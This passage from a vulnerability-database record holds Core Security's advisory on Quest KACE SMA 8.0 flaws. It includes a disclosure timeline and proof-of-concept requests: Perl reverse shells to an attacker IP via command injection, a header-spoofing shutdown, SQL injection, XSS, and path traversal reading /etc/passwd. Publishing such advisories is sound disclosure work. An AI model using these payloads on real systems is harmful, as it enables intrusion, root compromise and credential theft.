disclosure process and expects vendors to coordinate with it prior to\npublication via Quest\u0027s vulnerability reporting process, and that Quest\u0027s\nlegal threat appears to be in direct contradiction to the disclosure\nprocess that they encourage on their website. Finally, Core asked about\nQuest\u0027s intention to work collaboratively to address these vulnerabilities\nand to follow industry standard disclosure processes that involves\npublication of the vulnerabilities. \n2018-04-17: Quest\u0027s KACE PM replied saying it is willing to collaborate\nand is looking forward to having a conversation over the phone in order to\ncontinue the next steps in its vulnerability process (forwarded email from\n2018-04-13). \n2018-04-17: Core thanked the answer and stated the willingness of keeping\nwritten communications between parties in order to better document the\nprocess and communicated the next steps of the process including: 1. Testing\nthe fix (if vendor agrees), 2. Get CVE-IDs, 3. Get a Vendor\u0027s link to be\nincluded in the advisory and finally 4. Send final advisory version to\nvendor and coordinate publication date together. With regards to Quest\u0027s\nrequests, Core provided the researchers names and URL of the advisory when\nit will be published. Finally, Core stated that the request for other Core\ncompany services could be forwarded to the Core services team if needed\n(and asked the right contact at Quest) but our intention is to keep that\nservices request separate from the coordinated disclosure process. \n2018-04-18: Quest Support informed that they had publicly made available\npatches for its customers and unilaterally closed the case. \n2018-05-31: Advisory CORE-2018-0004 published. \n\n9. *References*\n\n[1] https://www.quest.com/products/kace-systems-management-appliance/\n\n10. *About CoreLabs*\n\nCoreLabs, the research center of Core Security, is charged with anticipating\nthe future needs and requirements for information security technologies. \nWe conduct our research in several important areas of computer security\nincluding system vulnerabilities, cyber-attack planning and simulation,\nsource code auditing, and cryptography. Our results include problem\nformalization, identification of vulnerabilities, novel solutions and\nprototypes for new technologies. CoreLabs regularly publishes security\nadvisories, technical papers, project information and shared software\ntools for public use at:\nhttp://corelabs.coresecurity.com. \n\n11. *About Core Security*\n\nCore Security provides companies with the security insight they need to\nknow who, how, and what is vulnerable in their organization. The company\u0027s\nthreat-aware, identity amp; access, network security, and vulnerability\nmanagement solutions provide actionable insight and context needed to\nmanage security risks across the enterprise. This shared insight gives\ncustomers a comprehensive view of their security posture to make better\nsecurity remediation decisions. Better insight allows organizations to\nprioritize their efforts to protect critical assets, take action sooner\nto mitigate access risk, and react faster if a breach does occur. \n\nCore Security is headquartered in the USA with offices and operations in\nSouth America, Europe, Middle East and Asia. To learn more, contact Core\nSecurity at (678) 304-4500 or info@coresecurity.com\n\n12. *Disclaimer*\n\nThe contents of this advisory are copyright (c) 2018 Core Security and (c)\n2018 CoreLabs, and are licensed under a Creative Commons Attribution\nNon-Commercial Share-Alike 3.0 (United States) License:\nhttp://creativecommons.org/licenses/by-nc-sa/3.0/us/\n\n13. *PGP/GPG Keys*\n\nThis advisory has been signed with the GPG key of Core Security\nadvisories team, which is available for download at\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-11132"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005456"
},
{
"db": "CNVD",
"id": "CNVD-2018-10906"
},
{
"db": "VULMON",
"id": "CVE-2018-11132"
},
{
"db": "PACKETSTORM",
"id": "148005"
}
],
"trust": 2.34
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-11132",
"trust": 3.2
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005456",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2018-10906",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1222",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "148005",
"trust": 0.2
},
{
"db": "VULMON",
"id": "CVE-2018-11132",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-10906"
},
{
"db": "VULMON",
"id": "CVE-2018-11132"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005456"
},
{
"db": "PACKETSTORM",
"id": "148005"
},
{
"db": "NVD",
"id": "CVE-2018-11132"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1222"
}
]
},
"id": "VAR-201805-0592",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-10906"
}
],
"trust": 1.1800866
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-10906"
}
]
},
"last_update_date": "2023-12-18T12:01:57.686000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "KACE Systems Management Appliance",
"trust": 0.8,
"url": "https://www.quest.com/products/kace-systems-management-appliance/"
},
{
"title": "Patch for QuestKACESystemManagementAppliance Command Injection Vulnerability (CNVD-2018-10906)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/131201"
},
{
"title": "Quest KACE System Management Appliance Fixes for operating system command injection vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=81234"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-10906"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005456"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1222"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-78",
"trust": 1.0
},
{
"problemtype": "CWE-77",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-005456"
},
{
"db": "NVD",
"id": "CVE-2018-11132"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.2,
"url": "https://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11132"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-11132"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/78.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://packetstormsecurity.com/files/148005/quest-kace-system-management-appliance-8.0-build-8.0.318-xss-traversal-code-execution-sql-injection.html"
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11139"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11134"
},
{
"trust": 0.1,
"url": "http://[serverip]/common/download_agent_installer.php?platform=windows\u0026serv=58b9e89c12f57e492df8f1d744b6ed5a4d394b454ca8a99176caba35fd13ec1f\u0026orgid=1"
},
{
"trust": 0.1,
"url": "http://[serverip]/systemui/settings_network.php"
},
{
"trust": 0.1,
"url": "https://support.quest.com/essentials/reporting-security-vulnerability."
},
{
"trust": 0.1,
"url": "http://[serverip]/adminui/advisory.php?id=10"
},
{
"trust": 0.1,
"url": "http://creativecommons.org/licenses/by-nc-sa/3.0/us/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11136"
},
{
"trust": 0.1,
"url": "http://www.coresecurity.com/files/attachments/core_security_advisories.asc."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11135"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11140"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11133"
},
{
"trust": 0.1,
"url": "https://www.quest.com/products/kace-systems-management-appliance/"
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com."
},
{
"trust": 0.1,
"url": "https://support.quest.com/essentials/vulnerability-reporting-acknowledgements)."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11141"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11142"
},
{
"trust": 0.1,
"url": "https://support.quest.com/download-install-detail/6086148."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11138"
},
{
"trust": 0.1,
"url": "http://[serverip]/adminui/analysis_report_list.php?category_id="
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11137"
},
{
"trust": 0.1,
"url": "http://[serverip]/common/run_cross_report.php?uniqueid=366314513\u0026id=585\u0026org=1\u0026fmt=xls34403\u0027)%3balert(1)%2f%2f952"
},
{
"trust": 0.1,
"url": "https://support.quest.com/kace-systems-management-appliance/kb/254193/security-vulnerability-patch-sec2018_20180410-"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-10906"
},
{
"db": "VULMON",
"id": "CVE-2018-11132"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005456"
},
{
"db": "PACKETSTORM",
"id": "148005"
},
{
"db": "NVD",
"id": "CVE-2018-11132"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1222"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2018-10906"
},
{
"db": "VULMON",
"id": "CVE-2018-11132"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005456"
},
{
"db": "PACKETSTORM",
"id": "148005"
},
{
"db": "NVD",
"id": "CVE-2018-11132"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1222"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-06-04T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-10906"
},
{
"date": "2018-05-31T00:00:00",
"db": "VULMON",
"id": "CVE-2018-11132"
},
{
"date": "2018-07-18T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-005456"
},
{
"date": "2018-05-31T20:52:06",
"db": "PACKETSTORM",
"id": "148005"
},
{
"date": "2018-05-31T18:29:00.247000",
"db": "NVD",
"id": "CVE-2018-11132"
},
{
"date": "2018-06-01T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201805-1222"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-06-04T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-10906"
},
{
"date": "2020-08-24T00:00:00",
"db": "VULMON",
"id": "CVE-2018-11132"
},
{
"date": "2018-07-18T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-005456"
},
{
"date": "2020-08-24T17:37:01.140000",
"db": "NVD",
"id": "CVE-2018-11132"
},
{
"date": "2020-08-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201805-1222"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "148005"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1222"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Quest KACE System Management Appliance Command injection vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-005456"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "operating system commend injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201805-1222"
}
],
"trust": 0.6
}
}
VAR-201805-0602
Vulnerability from variot - Updated: 2023-12-18 12:01The 'systemui/settings_network.php' and 'systemui/settings_patching.php' scripts in the Quest KACE System Management Appliance 8.0.318 are accessible only from localhost. This restriction can be bypassed by modifying the 'Host' and 'X_Forwarded_For' HTTP headers in a POST request. An anonymous user can abuse this vulnerability to execute critical functions without authorization. Quest KACE System Management Appliance Contains an authorization vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. QuestKACESystemManagementAppliance is an IT asset management device from QuestSoftware, USA. Advisory Information
Title: Quest KACE System Management Appliance Multiple Vulnerabilities Advisory ID: CORE-2018-0004 Advisory URL: http://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities Date published: 2018-05-31 Date of last update: 2018-05-22 Vendors contacted: Quest Software Inc. Release mode: Forced release
- Vulnerability Information
Class: Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Deserialization of Untrusted Data [CWE-502], Improper Privilege Management [CWE-269], Improper Privilege Management [CWE-269], Improper Authorization [CWE-285], Improper Neutralization of Special Elements used in an SQL Command [CWE-89], Improper Neutralization of Special Elements used in an SQL Command [CWE-89], Improper Neutralization of Input During Web Page Generation [CWE-79], External Control of File Name or Path [CWE-73], External Control of File Name or Path [CWE-73] Impact: Code execution Remotely Exploitable: Yes Locally Exploitable: Yes CVE Name: CVE-2018-11138, CVE-2018-11139, CVE-2018-11135, CVE-2018-11134, CVE-2018-11132, CVE-2018-11142, CVE-2018-11136, CVE-2018-11140, CVE-2018-11133, CVE-2018-11137, CVE-2018-11141
- Vulnerability Description
From Quest KACE's website:
"The KACE Systems Management Appliance [1] provides your growing organization with comprehensive management of network-connected devices, including servers, PCs, Macs, Chromebooks, tablets, printers, storage, networking gear and the Internet of Things (IoT). KACE can fulfill all of your organization's systems management needs, from initial deployment to ongoing management and retirement."
Multiple vulnerabilities were found in the Quest KACE System Management Virtual Appliance that would allow a remote attacker to gain command execution as root. We present three vectors to achieve this, including one that can be exploited as an unauthenticated user.
Additional web application vulnerabilities were found in the web console that is bundled with the product. These vulnerabilities are detailed in section 7.
Note: This advisory has limited details on the vulnerabilities because during the attempted coordinated disclosure process, Quest advised us not to distribute our original findings to the public or else they would take legal action. Quest's definition of "responsible disclosure" can be found at https://support.quest.com/essentials/reporting-security-vulnerability.
CoreLabs has been publishing security advisories since 1997 and believes in coordinated disclosure and good faith collaboration with software vendors before disclosure to help ensure that a fix or workaround solution is ready and available when the vulnerability details are publicized. We believe that providing technical details about each finding is necessary to provide users and organizations with enough information to understand the implications of the vulnerabilities against their environment and, most importantly, to prioritize the remediation activities aiming at mitigating risk.
We regret Quest's posture on disclosure during the whole process (detailed in the Report Timeline section) and the lack of a possibility of engaging into a coordinated publication date, something we achieve (and have achieved) with many vendors as part of our coordinated disclosure practices.
- Vulnerable Packages
.
- Vendor Information, Solutions and Workarounds
Quest reports that it has released the security vulnerability patch SEC2018_20180410 to address the reported vulnerabilities. Patch can be download at https://support.quest.com/download-install-detail/6086148.
For more details, Quest published the following Security Note: https://support.quest.com/kace-systems-management-appliance/kb/254193/security-vulnerability-patch-sec2018_20180410-
- Credits
These vulnerabilities were discovered and researched by Leandro Barragan and Guido Leo from Core Security Consulting Services. The publication of this advisory was coordinated by Leandro Cuozzo from Core Advisories Team.
- Technical Description / Proof of Concept Code
Quest KACE SMA ships with a web console that provides administrators and users with several features. Multiple vulnerabilities were found in the context of this console, both from an authenticated and unauthenticated perspective.
Section 7.1 describes how an unauthenticated attacker could gain command execution on the system as the web server user.
Vulnerabilities described in 7.2 and 7.3 could also be abused to gain code execution but would require the attacker to have a valid authentication token.
In addition, issues found in the Sudo Server module presented in 7.4 and 7.5 would allow the attacker to elevate his privileges from the web server user to root, effectively obtaining full control of the device.
Additional web application vulnerabilities were found in the console, such as insufficient authorization for critical functions, which would allow an anonymous attacker to reconfigure the appliance (7.6), SQL injection vulnerabilities (7.7, 7,8), a cross-site scripting issue (7.9), and path traversal vulnerabilities, which would allow an attacker to read, write and delete arbitrary files (7.9, 7.10, 7.11).
7.1. Unauthenticated command injection
[CVE-2018-11138] The '/common/download_agent_installer.php' script is accessible to anonymous users in order to download an agent for a specific platform. This behavior can be abused to execute arbitrary commands on the system.
The script receives the following parameters via the GET method:
. platform: Indicates the platform in which the agent is going to be installed . serv: SHA256 hash of a fixed value that depends of each appliance . orgid: Organization ID . version: Version number of the agent
The last two conditions are simple to meet. The Agent versions are publicly available within the Quest KACE site, but even if they were not, we found that the Organization ID parameter is vulnerable to a time based SQL injection (refer to issue 7.7). This would make it possible to obtain the agent version by querying the table 'CLIENT_DISTRIBUTION' and fetching the contents of the 'VERSION' column. The Organization ID is 1 by default, but could be obtained in the same way as the Agent version by querying the table 'ORGANIZATION' and the column 'ID'.
As stated above, the application uses the Organization ID and Agent version parameters to execute commands. This means we need to find a way to append system commands within the Organization ID, without breaking the SQL query. If we use the comment symbol (#), we can append anything we want without affecting the result of the query.
Preparing payload:
/----- - platform = windows - serv = ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c - orgid = 1#;perl -e 'use Socket;$i="[AttackerIP]";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'; - version = 8.0.152 (last agent version available for windows) -----/
The following proof of concept executes a reverse shell:
/----- GET /common/download_agent_installer.php?platform=windows&serv=ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c&orgid=1%23%3bperl+-e+'use+Socket%3b$i%3d"[AttackerIP]"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">%26S")%3bopen(STDOUT,">%26S")%3bopen(STDERR,">%26S")%3bexec("/bin/sh+-i")%3b}%3b'%3b&version=8.0.152 HTTP/1.1 Host: Server Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 0 -----/
/----- $ nc -lvp 8080 Listening on [0.0.0.0] (family 0, port 8080) Connection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2, sport 20050) sh: can't access tty; job control turned off $ id uid=80(www) gid=80(www) groups=80(www) -----/
7.2. Authenticated command injection
[CVE-2018-11139] The '/common/ajax_email_connection_test.php' script used to test the configured SMTP server is accessible by any authenticated user and can be abused to execute arbitrary commands on the system. This script is vulnerable to command injection via the unsanitized user input 'TEST_SERVER' sent to the script via POST method.
The following proof of concept executes a reverse shell:
/----- POST /common/ajax_email_connection_test.php HTTP/1.1 Host: [ServerIP] Accept: application/json, text/javascript, /; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 416 Cookie: [Cookie] Connection: close
TEST_SERVER=test;perl+-e+'use+Socket%3b$i%3d"[AttackerIP]"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">%26S")%3bopen(STDOUT,">%26S")%3bopen(STDERR,">%26S")%3bexec("/bin/sh+-i")%3b}%3b';&TEST_PORT=587&TEST_USERNAME=eaea@eaea.com&TEST_PASSWORD=1234&TEST_OLD_PASSWORD=&QUEUE_ID=1&TEST_TO_EMAIL=eaea@eaea.com&ACTION=TEST_CONNECTION_SMTP -----/
/----- $ nc -lvp 8080 Listening on [0.0.0.0] (family 0, port 8080) Connection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2, sport 20050) sh: can't access tty; job control turned off $ id uid=80(www) gid=80(www) groups=80(www) -----/
7.3. PHP Object Injection leading to arbitrary command execution
[CVE-2018-11135] An authenticated user could abuse a deserialization call on the script '/adminui/error_details.php' to inject arbitrary PHP objects.
To exploit this issue, the parameter 'ERROR_MESSAGES' needs to be an array and meet some specific conditions in order to successfully exploit the issue.
7.4. Privilege escalation via password change in Sudo Server
[CVE-2018-11134] In order to perform actions that requires higher privileges, the application relies on a message queue managed that runs with root privileges and only allows a set of commands.
One of the available commands allows to change any user's password (including root).
Assuming we are able to run commands in the server, we could abuse this feature by changing the password of the 'kace_support' account, which comes disabled by default but has full sudo privileges.
7.5. Privilege escalation via command injection in Sudo Server
[CVE-2018-11132] As mentioned in the issue [7.4], in order to perform actions that require higher privileges, the application relies on a message queue that runs daemonized with root privileges and only allows a set of commands to be executed.
A command injection vulnerability exists within this message queue which allows us to append arbitrary commands that will be run as root.
7.6.
The following proof of concept abuses this vulnerability to shutdown the server as an anonymous user:
/----- POST /systemui/settings_network.php HTTP/1.1 Host: localhost X-Forwarded-For: ::1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://[ServerIp]/systemui/settings_network.php Content-Type: multipart/form-data; boundary=---------------------------5642543667001619951434940129 Content-Length: 3418 Connection: close Upgrade-Insecure-Requests: 1
-----------------------------5642543667001619951434940129 Content-Disposition: form-data; name="CSRF_TOKEN" -----------------------------5642543667001619951434940129 Content-Disposition: form-data; name="$shutdown" DoIt! Content-Disposition: form-data; name="save" Save -----------------------------5642543667001619951434940129-- -----/
7.7. Unauthenticated SQL Injection in download_agent_installer.php
[CVE-2018-11136] The 'orgID' parameter received by the '/common/download_agent_installer.php' script is not sanitized, leading to SQL injection. In particular, a blind time based type.
The following proof of concept induces a time delay:
/----- http://[ServerIP]/common/download_agent_installer.php?platform=windows&serv=58b9e89c12f57e492df8f1d744b6ed5a4d394b454ca8a99176caba35fd13ec1f&orgid=1 AND SLEEP(10)%23;&version=8.0.152 -----/
7.8. SQL Injection in run_report.php
[CVE-2018-11140] The 'reportID' parameter received by the '/common/run_report.php' script is not sanitized, leading to SQL injection. In particular, an error based type.
The following proof of concept retrieves the current database name:
/----- POST /common/run_report.php HTTP/1.1 Content-Length: 161 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Host: [ServerIP] Accept: text/html,application/xhtml xml,application/xml;q=0.9,/;q=0.8 Connection: close Referer: http://[ServerIP]/adminui/analysis_report_list.php?CATEGORY_ID= Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Cookie: [Cookie]
date=1516135247598&reportId=-3161+UNION+ALL+SELECT+CONCAT(0x7170706a71,IFNULL(CAST(DATABASE()+AS+CHAR),0x20),0x716a707171),NULL--+LhEx&reportName=&format=pdf -----/
/----- HTTP/1.1 200 OK Date: Thu, 08 Feb 2018 21:50:21 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Access-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key, x-kace-auth-signature, accept, origin, content-type Access-Control-Allow-Origin: * Access-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS X-KACE-Appliance: K1000 X-KACE-Host: [ServerIP] X-KACE-Version: 8.0.318 X-KBOX-WebServer: [ServerIP] X-KBOX-Version: 8.0.318 X-KACE-WebServer: [ServerIP] X-UA-Compatible: IE=9,EDGE Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform Content-Length: 3548 Connection: close Content-Type: text/html; charset=utf-8
[...SNIPPED...]
<![endif]-->Report Queued: qppjqORG1qjpqq<meta http-equiv='refresh' [...SNIPPED...] -----/
7.9. Unauthenticated Cross Site Scriting in run_cross_report.php
[CVE-2018-11133] The 'fmt' parameter of the '/common/run_cross_report.php' script is vulnerable to cross-site scripting.
The following proof of concept demonstrates the vulnerability:
/----- http://[ServerIP]/common/run_cross_report.php?uniqueId=366314513&id=585&org=1&fmt=xls34403')%3balert(1)%2f%2f952 -----/
7.10. Path traversal in download_attachment.php leading to arbitrary file read
[CVE-2018-11137] The 'checksum' parameter of the '/common/download_attachment.php' script can be abused to read arbitrary files with 'www' privileges. The following proof of concept reads the '/etc/passwd' file. No administrator privileges are needed to execute this script.
It is worth noting that there are several interesting files that can be read with 'www' privileges, such as all the files located in '/kbox/bin/koneas/keys/' and '/kbox/kboxwww/include/globals.inc', which contain plaintext passwords.
/----- http://[ServerIP]/common/run_cross_report.php?uniqueId=366314513&id=585&org=1&fmt=xls34403')%3balert(1)%2f%2f952 -----/
The following proof of concept demonstrates the vulnerability:
/----- GET /common/download_attachment.php?checksum=/../../../../../../../../../../../etc/passwd&filename= HTTP/1.1 Host: [ServerIP] Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: [Cookie] Connection: close Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK Date: Thu, 18 Jan 2018 17:18:19 GMT Server: Apache Cache-Control: must-revalidate, post-check=0, pre-check=0 Expires: -1 Pragma: public Content-Disposition: attachment; filename="" Content-Transfer-Encoding: Binary Content-Description: K1000 attachment Content-Length: 2400 Access-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key, x-kace-auth-signature, accept, origin, content-type Access-Control-Allow-Origin: * Access-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS X-KACE-Appliance: K1000 X-KACE-Host: k10000. X-KACE-Version: 8.0.318 X-KBOX-WebServer: k10000. X-KBOX-Version: 8.0.318 X-KACE-WebServer: k10000. X-UA-Compatible: IE=9,EDGE Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform Connection: close Content-Type: application/octet-stream
$FreeBSD: releng/11.0/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr $
root::0:0:Charlie &:/root:/bin/csh daemon::1:1:Owner of many system processes:/root:/usr/sbin/nologin operator::2:5:System &:/:/usr/sbin/nologin bin::3:7:Binaries Commands and Source:/:/usr/sbin/nologin tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin[...SNIPPED...] -----/
7.11. Path traversal in advisory.php leading to arbitrary file creation/deletion
[CVE-2018-11141] The 'IMAGES_JSON' and 'attachments_to_remove[]' parameters of the '/adminui/advisory.php' script can be abused to write and delete files respectively. The following proof of concept creates a file located at '/kbox/kboxwww/resources/TestWrite' with the content 'Sarasa' (base64 encoded). Files can be at any location where the 'www' user has write permissions.
File deletion could be abused to delete '/kbox/kboxwww/systemui/reports/setup_completed.log' file. This file's existence defines if the appliance setup wizard is shown or not.
The following proof of concept demonstrates the vulnerability:
/----- POST /adminui/advisory.php?ID=10 HTTP/1.1 Host: [ServerIP] Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://[ServerIP]/adminui/advisory.php?ID=10 Content-Type: multipart/form-data; boundary=---------------------------2671551246366368501556269100 Content-Length: 1705 Cookie: [Cookie] Connection: close Upgrade-Insecure-Requests: 1
-----------------------------2671551246366368501556269100 Content-Disposition: form-data; name="CSRF_TOKEN"
99c2addf067719d6fc3ae32ded351f000af8efdd091f162baa2a34516cefecc741cb13a69c80554a9ba32908d1c683102d3455eac39bcafc8854f46a04b2044e -----------------------------2671551246366368501556269100 Content-Disposition: form-data; name="IMAGES_JSON"
{"/../../../resources/TestWrite":"aaaaaa,VGVzdENvbnRlbnQ="} -----------------------------2671551246366368501556269100 Content-Disposition: form-data; name="FARRAY[ID]" [...SNIPPED...] -----/
Taking advantage of 7.2 and 7.4 we are able to verify the file creation:
/----- [root@k10000 /kbox/kboxwww/resources]# ls -lha total 32 drwxr-xr-x 2 www wheel 512B Feb 9 20:40 . drwxr-xr-x 23 root wheel 512B Nov 14 18:29 .. -rw-r--r-- 1 www wheel 11B Feb 9 20:40 TestWrite -----/
-
Report Timeline 2018-02-26: Core Security (Core) sent an initial notification to Quest Software Inc. (Quest) via web form. 2018-03-05: Quest Support confirmed the receipt and requested additional information. 2018-03-12: Core Security sent a draft advisory including a technical description. 2018-03-16: Quest Support asked for the CVE-IDs. 2018-03-16: Core Security answered saying that the CVE-IDs are required once the vendor verifies the vulnerabilities. Additionally, Core Security requested a confirmation about the reported vulnerabilities and a tentative timescale to fix them. Finally, Core Security requested that Quest use Core's advisories-publication email address as the official communication hannel also copying the researchers behind this discovery. 2018-03-16: Quest Support thanked Core's reply and stated it will be in touch during the process. 2018-03-20: Quest Support informed that they had not yet received any updates from the engineering team and had requested one. 2018-03-21: Quest Support requested information about the KACE version used for reporting the issues and also Core's company name and information. 2018-03-21: Core replied with the affected version (that was included in the original draft advisory) and a link to the Core company website and the list of previous security advisories. 2018-03-21: Quest Support acknowledged the information provided. 2018-03-26: Quest's 